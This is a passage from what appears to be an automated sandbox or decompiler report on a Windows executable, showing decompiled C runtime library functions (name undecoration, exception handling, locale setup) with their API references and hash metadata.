                  												__eflags =  !(_t138 >> 1) & 0x00000001;
                  												if(__eflags == 0) {
                  													_t142 = E0041920C(_t218, __eflags,  &_v52);
                  													_t189 =  &_v12;
                  													E004169B3( &_v12, _t142);
                  												} else {
                  													_t149 = E004177BF(_t189,  &_v36, 0x20, E0041920C(_t218, __eflags,  &_v44));
                  													_t228 = _t228 + 0x10;
                  													_t150 = E0041756B(_t149,  &_v52,  &_v12);
                  													_t189 =  *_t150;
                  													_v12 =  *_t150;
                  													_v8 = _t150[1];
                  												}
                  											}
                  											_t94 =  *0x451268; // 0x0
                  											_t96 =  !(_t94 >> 1);
                  											__eflags = _t96 & 0x00000001;
                  											if((_t96 & 0x00000001) == 0) {
                  												_t98 = E00417488(_t189,  &_v52);
                  												_t191 =  &_v12;
                  												E004169B3( &_v12, _t98);
                  											} else {
                  												_t136 = E0041756B(E00417488(_t189,  &_v44),  &_v52,  &_v12);
                  												_t191 =  *_t136;
                  												_v12 =  *_t136;
                  												_v8 =  *((intOrPtr*)(_t136 + 4));
                  											}
                  											__eflags =  *_t224;
                  											if( *_t224 != 0) {
                  												_t129 = E004177BF(_t191,  &_v44, 0x28,  &_v12);
                  												_t228 = _t228 + 0xc;
                  												_t130 = E0041782B(_t129,  &_v52, 0x29);
                  												_v12 =  *_t130;
                  												_v8 =  *((intOrPtr*)(_t130 + 4));
                  											}
                  											_t100 = E00416833(0x451238, 8, 0);
                  											__eflags = _t100;
                  											if(_t100 == 0) {
                  												_t225 = 0;
                  												__eflags = 0;
                  											} else {
                  												 *(_t100 + 4) = 0;
                  												 *(_t100 + 4) =  *(_t100 + 4) & 0xffff00ff;
                  												 *_t100 = 0;
                  												_t225 = _t100;
                  											}
                  											E00417055( &_v28, _t225);
                  											_pop(_t194);
                  											E004173A9( &_v12, E0041782B(E004177BF(_t194,  &_v36, 0x28, E00417A99(_t194,  &_v44)),  &_v52, 0x29));
                  											_t110 =  *0x451268; // 0x0
                  											__eflags = (_t110 & 0x00000060) - 0x60;
                  											if((_t110 & 0x00000060) != 0x60) {
                  												__eflags = _t221;
                  												if(_t221 != 0) {
                  													E004173A9( &_v12,  &_v20);
                  												}
                  											}
                  											_t112 =  *0x451268; // 0x0
                  											_t114 =  !(_t112 >> 8);
                  											__eflags = _t114 & 0x00000001;
                  											_push( &_v52);
                  											if((_t114 & 0x00000001) == 0) {
                  												E004169B3( &_v12, E00417B75());
                  											} else {
                  												E004173A9( &_v12, E00417B75());
                  											}
                  											__eflags = _t225;
                  											if(_t225 == 0) {
                  												_push(3);
                  												goto L51;
                  											} else {
                  												 *_t225 = _v12;
                  												 *((intOrPtr*)(_t225 + 4)) = _v8;
                  												_t119 = _a4;
                  												 *_t119 = _v28;
                  												 *((intOrPtr*)(_t119 + 4)) = _v24;
                  											}
                  										} else {
                  											_t154 = E00417807(_t189,  &_v36, "::",  &_v12);
                  											_t211 =  *_t154;
                  											_v8 =  *((intOrPtr*)(_t154 + 4));
                  											_t156 =  *0x451258; // 0x0
                  											_t230 = _t228 + 0xc;
                  											__eflags =  *_t156;
                  											_v12 =  *_t154;
                  											_push( &_v12);
                  											if( *_t156 == 0) {
                  												_push(1);
                  												_push( &_v52);
                  												_t159 = E004177E3(_t211);
                  												_t228 = _t230 + 0xc;
                  											} else {
                  												_t176 = E004177BF(_t211,  &_v52, 0x20, E0041A057(_t218));
                  												_t228 = _t230 + 0x10;
                  												_t159 = E0041756B(_t176,  &_v44,  &_v36);
                  											}
                  											_t212 =  *_t159;
                  											_v8 = _t159[1];
                  											_t161 =  *0x451258; // 0x0
                  											_t162 =  *_t161;
                  											_v12 =  *_t159;
                  											__eflags = _t162;
                  											if(_t162 == 0) {
                  												E004177E3(_t212, _a4, 1,  &_v12);
                  												goto L52;
                  											} else {
                  												__eflags = _t162 - 0x40;
                  												if(_t162 != 0x40) {
                  													_push(2);
                  													L51:
                  													E00416DBC(_a4);
                  													L52:
                  													_t119 = _a4;
                  												} else {
                  													_t165 =  *0x451268; // 0x0
                  													 *0x451258 =  *0x451258 + 1;
                  													__eflags = (_t165 & 0x00000060) - 0x60;
                  													_push( &_v52);
                  													if((_t165 & 0x00000060) == 0x60) {
                  														_t168 = E00416CE5();
                  														_t189 =  &_v20;
                  														E004169B3( &_v20, _t168);
                  													} else {
                  														_t170 = E00416CE5();
                  														_t189 =  *_t170;
                  														_v20 =  *_t170;
                  														_v16 = _t170[1];
                  													}
                  													goto L27;
                  												}
                  											}
                  										}
                  									} else {
                  										E00416DBC(_a4, 2);
                  										L18:
                  										_t119 = _a4;
                  									}
                  								}
                  							}
                  							return _t119;
                  						} else {
                  							goto L5;
                  						}
                  					}
                  				} else {
                  					E004177E3(_t189, _a4, 1, _a8);
                  					L2:
                  					return _a4;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: operator+$NameName::$Decorator::getName::operator+$ThisType$Name::operator|=Scope
                  • String ID:
                  • API String ID: 398566123-0
                  • Opcode ID: ff38cd19dd91b43b892d78873fea5212fb9c573c3c8ebf9f76cd3c8a6541c70d
                  • Instruction ID: 7ff60aafb26cf4e29bd4d62d35c9de8c198d3cfcbef095173d456e88713f6a6d
                  • Opcode Fuzzy Hash: ff38cd19dd91b43b892d78873fea5212fb9c573c3c8ebf9f76cd3c8a6541c70d
                  • Instruction Fuzzy Hash: 9FB19171904208AFCB00EFA4D885EEE77B8AF08304F14416BF515E7291DB38DAC5CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E004067EF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t23;
                  				intOrPtr _t28;
                  				intOrPtr _t32;
                  				intOrPtr _t45;
                  				void* _t46;
                  
                  				_t35 = __ebx;
                  				_push(0xc);
                  				_push(0x47df70);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t44 = L"KERNEL32.DLL";
                  				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                  				if(_t23 == 0) {
                  					_t23 = E00406EAE(_t44);
                  				}
                  				 *(_t46 - 0x1c) = _t23;
                  				_t45 =  *((intOrPtr*)(_t46 + 8));
                  				 *((intOrPtr*)(_t45 + 0x5c)) = 0x47b990;
                  				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                  				if(_t23 != 0) {
                  					_t35 = GetProcAddress;
                  					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                  					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                  				}
                  				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                  				 *((char*)(_t45 + 0xc8)) = 0x43;
                  				 *((char*)(_t45 + 0x14b)) = 0x43;
                  				 *(_t45 + 0x68) = 0x44f740;
                  				E0040CFC1(_t35, 0xd);
                  				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                  				InterlockedIncrement( *(_t45 + 0x68));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				E004068C4();
                  				E0040CFC1(_t35, 0xc);
                  				 *(_t46 - 4) = 1;
                  				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                  				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                  				if(_t28 == 0) {
                  					_t32 =  *0x44fd48; // 0x44fc70
                  					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                  				}
                  				E0040EC63( *((intOrPtr*)(_t45 + 0x6c)));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				return E00404209(E004068CD());
                  			}

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0047DF70,0000000C,0040692A,00000000,00000000,?,?,00403B83,00403E57,00000001,?,004021D5,00000001,?), ref: 00406801
                  • __crt_waiting_on_module_handle.LIBCMT ref: 0040680C
                    • Part of subcall function 00406EAE: Sleep.KERNEL32(000003E8,?,?,00406715,KERNEL32.DLL,?,0040AD43,?,00403E51,?,00000001,?,004021D5,00000001,?), ref: 00406EBA
                    • Part of subcall function 00406EAE: GetModuleHandleW.KERNEL32(?,?,?,00406715,KERNEL32.DLL,?,0040AD43,?,00403E51,?,00000001,?,004021D5,00000001,?), ref: 00406EC3
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406835
                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00406845
                  • __lock.LIBCMT ref: 00406867
                  • InterlockedIncrement.KERNEL32(0044F740), ref: 00406874
                  • __lock.LIBCMT ref: 00406888
                  • ___addlocaleref.LIBCMT ref: 004068A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-2843748187
                  • Opcode ID: 6879677060a77e580d54f26ccf6d057929c4ce4625cc49d0746581c69afff43e
                  • Instruction ID: 4f57d67a29214185a11142792774fa2e3b781a15360e02eb98be558adc42a254
                  • Opcode Fuzzy Hash: 6879677060a77e580d54f26ccf6d057929c4ce4625cc49d0746581c69afff43e
                  • Instruction Fuzzy Hash: E511A2B2901701DAD710AF76D845B9ABBE0EF44314F10853FE4AAA62D1CB789985CB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041B24E(intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				char _v12;
                  				signed int _v16;
                  				char _v20;
                  				char _v28;
                  				void* __esi;
                  				char _t31;
                  				void* _t34;
                  				intOrPtr _t35;
                  				char _t37;
                  				void* _t38;
                  				void* _t40;
                  				void* _t48;
                  				char* _t64;
                  				char* _t66;
                  				void* _t70;
                  				intOrPtr* _t71;
                  
                  				_t64 =  *0x451258; // 0x0
                  				_v8 = _v8 & 0xffff0000;
                  				_t31 =  *_t64;
                  				_v12 = 0;
                  				if(_t31 == 0) {
                  					L19:
                  					E004177E3(0xffff0000, _a4, 1, _a8);
                  					L20:
                  					L21:
                  					return _a4;
                  				}
                  				_t34 = _t31 - 0x24;
                  				if(_t34 == 0) {
                  					_t35 =  *((intOrPtr*)(_t64 + 1));
                  					if(_t35 == 0x24) {
                  						_t66 = _t64 + 2;
                  						 *0x451258 = _t66;
                  						_t37 =  *_t66;
                  						if(_t37 == 0) {
                  							goto L19;
                  						}
                  						_t38 = _t37 - 0x41;
                  						if(_t38 == 0) {
                  							 *0x451258 = _t66 + 1;
                  							E0041A2C7(_t66 + 1, _a4, _a8);
                  							L5:
                  							goto L21;
                  						}
                  						_t40 = _t38 - 1;
                  						if(_t40 == 0) {
                  							 *0x451258 = _t66 + 1;
                  							E00418444(_t66 + 1, _t70, _a4, _a8, 1);
                  							goto L20;
                  						}
                  						if(_t40 != 1) {
                  							L11:
                  							E00416DBC(_a4, 2);
                  							goto L21;
                  						}
                  						_v8 = _v8 & 0xffff0000;
                  						 *0x451258 = _t66 + 1;
                  						_v12 = 0;
                  						E0041AE97(0xffff0000, _t66 + 1, _a4, E0041A61B( &_v28, _a8, 0,  &_v12, 0));
                  						goto L21;
                  					}
                  					if(_t35 == 0) {
                  						goto L19;
                  					}
                  					goto L11;
                  				}
                  				_t48 = _t34 - 0x1d;
                  				_t71 = _a8;
                  				if(_t48 == 0) {
                  					L8:
                  					 *0x451258 =  *0x451258 + 1;
                  					_v20 =  *_t71;
                  					_v16 =  *(_t71 + 4) | 0x00000100;
                  					E0041AD46(_a4,  &_v12,  &_v20);
                  					goto L20;
                  				}
                  				if(_t48 == 1) {
                  					E00417453( &_v12, "volatile");
                  					if( *_t71 != 0) {
                  						E004175B3( &_v12, 0x20);
                  					}
                  					goto L8;
                  				}
                  				E0041AE97(0xffff0000, _t64, _a4, _t71);
                  				goto L5;
                  			}

                  APIs
                  • UnDecorator::getBasicDataType.LIBCMT ref: 0041B28A
                  • DName::operator=.LIBCMT ref: 0041B29E
                  • DName::operator+=.LIBCMT ref: 0041B2AC
                  • UnDecorator::getReferenceType.LIBCMT ref: 0041B2D3
                  • DName::DName.LIBCMT ref: 0041B2F1
                  • UnDecorator::getDataIndirectType.LIBCMT ref: 0041B32F
                  • UnDecorator::getBasicDataType.LIBCMT ref: 0041B338
                  • operator+.LIBCMT ref: 0041B377
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Decorator::getType$Data$Basic$IndirectNameName::Name::operator+=Name::operator=Referenceoperator+
                  • String ID: volatile
                  • API String ID: 2092030914-4266433718
                  • Opcode ID: 6f3c57807fac93feab1c77a3dfc6992bba71baf33062bcba5b6727b3a5bba0d6
                  • Instruction ID: 3042dc26837de7a3af4c02202fe795b733d343c523731ee85f887a3b0b9639e7
                  • Opcode Fuzzy Hash: 6f3c57807fac93feab1c77a3dfc6992bba71baf33062bcba5b6727b3a5bba0d6
                  • Instruction Fuzzy Hash: 5531D031800248ABCB11AF65CC819FE7F79FB44300F10806BF855AA261D7398AD58B89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0040C422(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
                  				signed int _v16;
                  				signed int _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int* _t28;
                  				void* _t29;
                  				signed int* _t31;
                  				void* _t33;
                  				intOrPtr _t34;
                  				intOrPtr _t36;
                  				signed int* _t38;
                  				signed int _t41;
                  				signed int _t49;
                  				signed int _t52;
                  				void* _t53;
                  				signed int _t55;
                  				signed int _t57;
                  				signed int _t59;
                  				void* _t61;
                  				void* _t62;
                  
                  				_t28 = _a4;
                  				_t62 = _t61 - 0x10;
                  				if(_t28 != 0) {
                  					_t49 = _a12;
                  					_t59 =  *_t28;
                  					_t55 = _a8;
                  					__eflags = _t55;
                  					if(_t55 == 0) {
                  						L4:
                  						_t29 =  *_t59;
                  						__eflags = _t29 - 0xe0434f4d;
                  						if(_t29 == 0xe0434f4d) {
                  							L21:
                  							__eflags = _t29 - 0xe06d7363;
                  							if(__eflags != 0) {
                  								L29:
                  								_t31 = E0040694F(_t49, _t53, _t55, __eflags) + 0x90;
                  								 *_t31 =  *_t31 + 1;
                  								__eflags =  *_t31;
                  								goto L30;
                  							} else {
                  								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
                  								if(__eflags != 0) {
                  									goto L29;
                  								} else {
                  									_t34 =  *((intOrPtr*)(_t59 + 0x14));
                  									__eflags = _t34 - 0x19930520;
                  									if(_t34 == 0x19930520) {
                  										L26:
                  										__eflags =  *(_t59 + 0x1c);
                  										if(__eflags != 0) {
                  											goto L29;
                  										} else {
                  											__eflags =  *(E0040694F(_t49, _t53, _t55, __eflags) + 0x88);
                  											if(__eflags != 0) {
                  												goto L29;
                  											} else {
                  												goto L28;
                  											}
                  										}
                  									} else {
                  										__eflags = _t34 - 0x19930521;
                  										if(_t34 == 0x19930521) {
                  											goto L26;
                  										} else {
                  											__eflags = _t34 - 0x19930522;
                  											if(__eflags != 0) {
                  												goto L29;
                  											} else {
                  												goto L26;
                  											}
                  										}
                  									}
                  								}
                  							}
                  						} else {
                  							__eflags = _t49 & 0x00000040;
                  							if((_t49 & 0x00000040) == 0) {
                  								goto L21;
                  							} else {
                  								goto L6;
                  							}
                  						}
                  					} else {
                  						__eflags =  *((char*)(_t55 + 8));
                  						if( *((char*)(_t55 + 8)) != 0) {
                  							L6:
                  							__eflags =  *_t59 - 0xe06d7363;
                  							if( *_t59 != 0xe06d7363) {
                  								L28:
                  								_t33 = 0;
                  							} else {
                  								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
                  								if( *((intOrPtr*)(_t59 + 0x10)) != 3) {
                  									goto L28;
                  								} else {
                  									_t36 =  *((intOrPtr*)(_t59 + 0x14));
                  									__eflags = _t36 - 0x19930520;
                  									if(_t36 == 0x19930520) {
                  										L11:
                  										__eflags =  *(_t59 + 0x1c);
                  										if(__eflags != 0) {
                  											L14:
                  											_t38 =  *( *(_t59 + 0x1c) + 0xc);
                  											_v16 = _t55;
                  											_t57 =  *_t38;
                  											_v20 = _t49 | 0x80000000;
                  											_t52 =  &(_t38[1]);
                  											while(1) {
                  												__eflags = _t57;
                  												if(_t57 <= 0) {
                  													break;
                  												}
                  												_a4 =  *_t52;
                  												_t41 = E0040B97C( &_v20,  *_t52,  *(_t59 + 0x1c));
                  												_t62 = _t62 + 0xc;
                  												__eflags = _t41;
                  												if(__eflags != 0) {
                  													 *((intOrPtr*)(E0040694F(_t52, _t53, _t57, __eflags) + 0x90)) =  *((intOrPtr*)(E0040694F(_t52, _t53, _t57, __eflags) + 0x90)) + 1;
                  													__eflags = _a16;
                  													if(__eflags != 0) {
                  														_push(_a4);
                  														_push( &_v20);
                  														_push(_a16);
                  														_push(_t59);
                  														E0040C390(_t52, _t57, _t59, __eflags);
                  													}
                  													L30:
                  													_t33 = 1;
                  													__eflags = 1;
                  												} else {
                  													_t57 = _t57 - 1;
                  													_t52 = _t52 + 4;
                  													__eflags = _t52;
                  													continue;
                  												}
                  												goto L31;
                  											}
                  											goto L28;
                  										} else {
                  											__eflags =  *(E0040694F(_t49, _t53, _t55, __eflags) + 0x88);
                  											if(__eflags == 0) {
                  												goto L28;
                  											} else {
                  												_t59 =  *(E0040694F(_t49, _t53, _t55, __eflags) + 0x88);
                  												goto L14;
                  											}
                  										}
                  									} else {
                  										__eflags = _t36 - 0x19930521;
                  										if(_t36 == 0x19930521) {
                  											goto L11;
                  										} else {
                  											__eflags = _t36 - 0x19930522;
                  											if(_t36 != 0x19930522) {
                  												goto L28;
                  											} else {
                  												goto L11;
                  											}
                  										}
                  									}
                  								}
                  							}
                  						} else {
                  							goto L4;
                  						}
                  					}
                  					L31:
                  					return _t33;
                  				} else {
                  					return _t28;
                  				}
                  			}


























                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __getptd
                  • String ID: MOC$csm$csm
                  • API String ID: 3384420010-2232927589
                  • Opcode ID: d60b8c64551a185b3ee984531602dc0423b384d77b570c3187fe3721b462a42a
                  • Instruction ID: 226bc9c285bf93f691323d83c4ce9491f08c873763805d48f6b67b2c9be1fa49
                  • Opcode Fuzzy Hash: d60b8c64551a185b3ee984531602dc0423b384d77b570c3187fe3721b462a42a
                  • Instruction Fuzzy Hash: 8F31EE75400211EFDF309F69C8D0B6A73A8FB50318F59463BD849E7392D738E9458A8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041920C(void* __edx, void* __eflags, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				char _v12;
                  				char _v20;
                  				char* _t15;
                  				intOrPtr* _t18;
                  				void* _t21;
                  				void* _t24;
                  				void* _t41;
                  
                  				_t41 = __edx;
                  				E00417184( &_v12, E00416815(0));
                  				_t15 =  *0x451258; // 0x0
                  				if( *_t15 == 0) {
                  					E00417099( &_v12, 1);
                  					goto L8;
                  				} else {
                  					 *0x451258 = _t15 + 1;
                  					_t21 =  *_t15 - 0x30;
                  					if(_t21 == 0) {
                  						E00417605( &_v12, "void");
                  						goto L8;
                  					} else {
                  						_t24 = _t21;
                  						if(_t24 == 0) {
                  							E004173A9( &_v12, E00418FD7(_t41, __eflags,  &_v20));
                  							goto L8;
                  						} else {
                  							if(_t24 != 3) {
                  								L8:
                  								E00417605( &_v12, ") ");
                  								_t18 = _a4;
                  								 *_t18 = _v12;
                  								 *((intOrPtr*)(_t18 + 4)) = _v8;
                  								return _t18;
                  							} else {
                  								E00416DBC(_a4, 2);
                  								return _a4;
                  							}
                  						}
                  					}
                  				}
                  			}












                  APIs
                  • UnDecorator::UScore.LIBCMT ref: 00419216
                  • DName::DName.LIBCMT ref: 00419222
                    • Part of subcall function 00417184: DName::doPchar.LIBCMT ref: 004171B1
                  • DName::DName.LIBCMT ref: 0041924F
                    • Part of subcall function 00416DBC: DNameStatusNode::make.LIBCMT ref: 00416DEA
                  • UnDecorator::getScopedName.LIBCMT ref: 0041925D
                  • DName::operator+=.LIBCMT ref: 00419267
                  • DName::operator+=.LIBCMT ref: 00419276
                  • DName::operator+=.LIBCMT ref: 00419282
                  • DName::operator+=.LIBCMT ref: 0041928F
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: NameName::operator+=$Name::$Decorator::Decorator::getName::doNode::makePcharScopedScoreStatus
                  • String ID: void
                  • API String ID: 2229739886-3531332078
                  • Opcode ID: 761812697dd23d617cca77f0d28cd9283ad3b946e7d4a8382082615a309bf7d3
                  • Instruction ID: f04134253eab2b0cddc6e7ff179a23c7d0877e382353d3a3029f6b8c55af4ac1
                  • Opcode Fuzzy Hash: 761812697dd23d617cca77f0d28cd9283ad3b946e7d4a8382082615a309bf7d3
                  • Instruction Fuzzy Hash: BB118670504148BBCB08EB65C856EED7BB49B40304F00009EE4169B2A2DB789EC5C749
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0040FB44(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t13;
                  				intOrPtr _t14;
                  				intOrPtr _t17;
                  				void* _t43;
                  				intOrPtr* _t51;
                  
                  				if(_a4 > 5 || _a8 == 0) {
                  					L4:
                  					return 0;
                  				} else {
                  					_t51 = E00406D1F(8, 1);
                  					_t57 = _t51;
                  					if(_t51 != 0) {
                  						_t13 = E00406D1F(0xd8, 1);
                  						 *_t51 = _t13;
                  						__eflags = _t13;
                  						if(__eflags != 0) {
                  							_t14 = E00406D1F(0x220, 1);
                  							 *((intOrPtr*)(_t51 + 4)) = _t14;
                  							__eflags = _t14;
                  							if(__eflags != 0) {
                  								E0040ED8B( *_t51, 0x44fc70);
                  								_t48 =  *_t51;
                  								_t17 = E0040F929(_a8,  *_t51, _a4);
                  								_pop(_t43);
                  								__eflags = _t17;
                  								if(__eflags != 0) {
                  									__eflags = E0040E733(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
                  									if(__eflags == 0) {
                  										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                  										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                  										L17:
                  										return _t51;
                  									}
                  									_push( *((intOrPtr*)(_t51 + 4)));
                  									E00403E62(__ebx, 1, _t51, __eflags);
                  									E0040ECF2( *_t51);
                  									E0040EB1A( *_t51);
                  									_push(_t51);
                  									E00403E62(__ebx, 1, _t51, __eflags);
                  									L15:
                  									_t51 = 0;
                  									goto L17;
                  								}
                  								E0040ECF2( *_t51);
                  								E0040EB1A( *_t51);
                  								_push(_t51);
                  								E00403E62(__ebx, 1, _t51, __eflags);
                  								goto L15;
                  							}
                  							_push( *_t51);
                  							E00403E62(__ebx, 1, _t51, __eflags);
                  							_push(_t51);
                  							E00403E62(__ebx, 1, _t51, __eflags);
                  							L8:
                  							goto L3;
                  						}
                  						_push(_t51);
                  						E00403E62(__ebx, 1, _t51, __eflags);
                  						goto L8;
                  					}
                  					L3:
                  					 *((intOrPtr*)(E00403B7E(_t57))) = 0xc;
                  					goto L4;
                  				}
                  			}












                  APIs
                  • __calloc_crt.LIBCMT ref: 0040FB5D
                    • Part of subcall function 00406D1F: __calloc_impl.LIBCMT ref: 00406D30
                    • Part of subcall function 00406D1F: Sleep.KERNEL32(00000000), ref: 00406D47
                  • __calloc_crt.LIBCMT ref: 0040FB81
                  • __calloc_crt.LIBCMT ref: 0040FB9D
                  • __copytlocinfo_nolock.LIBCMT ref: 0040FBC2
                  • __setlocale_nolock.LIBCMT ref: 0040FBCF
                  • ___removelocaleref.LIBCMT ref: 0040FBDB
                  • ___freetlocinfo.LIBCMT ref: 0040FBE2
                  • __setmbcp_nolock.LIBCMT ref: 0040FBFA
                  • ___removelocaleref.LIBCMT ref: 0040FC0F
                  • ___freetlocinfo.LIBCMT ref: 0040FC16
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                  • String ID:
                  • API String ID: 2969281212-0
                  • Opcode ID: c606d435dd84eb745c899e385ea71ef8a2edec459b89501ec37840d0ec171848
                  • Instruction ID: e89a778a04b0ec4ad81ea79935b569be5ffe93e0e2d6256a2857fdcf3fb35382
                  • Opcode Fuzzy Hash: c606d435dd84eb745c899e385ea71ef8a2edec459b89501ec37840d0ec171848
                  • Instruction Fuzzy Hash: BB21E431104601EAEB316F2AD812D0B7BF8EF80754B20883FF885766E1DE3DAC148A5D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0040201E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _v16;
                  				intOrPtr _v36;
                  				char _v52;
                  				char _v92;
                  				intOrPtr* _t34;
                  				intOrPtr* _t37;
                  
                  				_push(0x44);
                  				E00403401(E0044EBD8, __ebx, __edi, __esi);
                  				E00401230( &_v52, "invalid string position");
                  				_v16 = _v16 & 0x00000000;
                  				E00401F97( &_v92,  &_v52);
                  				E00402FB0( &_v92, 0x47de0c);
                  				asm("int3");
                  				_push(0x44);
                  				E00403401(E0044EBD8, __ebx, __edi, __esi);
                  				E00401230( &_v52, "invalid string argument");
                  				_v16 = _v16 & 0x00000000;
                  				_t34 =  &_v92;
                  				E00401F48(_t34,  &_v52);
                  				E00402FB0( &_v92, 0x47de48);
                  				asm("int3");
                  				_push(__esi);
                  				_t37 = _t34;
                  				E004011C0(_v36);
                  				 *_t37 = 0x47b23c;
                  				return _t37;
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00402025
                    • Part of subcall function 00401230: _strlen.LIBCMT ref: 0040124A
                  • std::bad_exception::bad_exception.LIBCMT ref: 00402042
                  • __CxxThrowException@8.LIBCMT ref: 00402050
                    • Part of subcall function 00402FB0: RaiseException.KERNEL32(?,?,00402DB8,?,?,?,?,?,00402DB8,?,0047E950,004507A0,?,?,?), ref: 00402FF2
                  • __EH_prolog3.LIBCMT ref: 0040205D
                  • std::bad_exception::bad_exception.LIBCMT ref: 0040207A
                  • __CxxThrowException@8.LIBCMT ref: 00402088
                    • Part of subcall function 004011C0: std::exception::exception.LIBCMT ref: 004011EE
                  Strings
                  • invalid string position, xrefs: 0040202A
                  • invalid string argument, xrefs: 00402062
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Exception@8H_prolog3Throwstd::bad_exception::bad_exception$ExceptionRaise_strlenstd::exception::exception
                  • String ID: invalid string argument$invalid string position
                  • API String ID: 3808644628-3740083952
                  • Opcode ID: dba47893a7da555e3c11fbd17a0312a2a1dec5ab0de22282eae602774f7d84e4
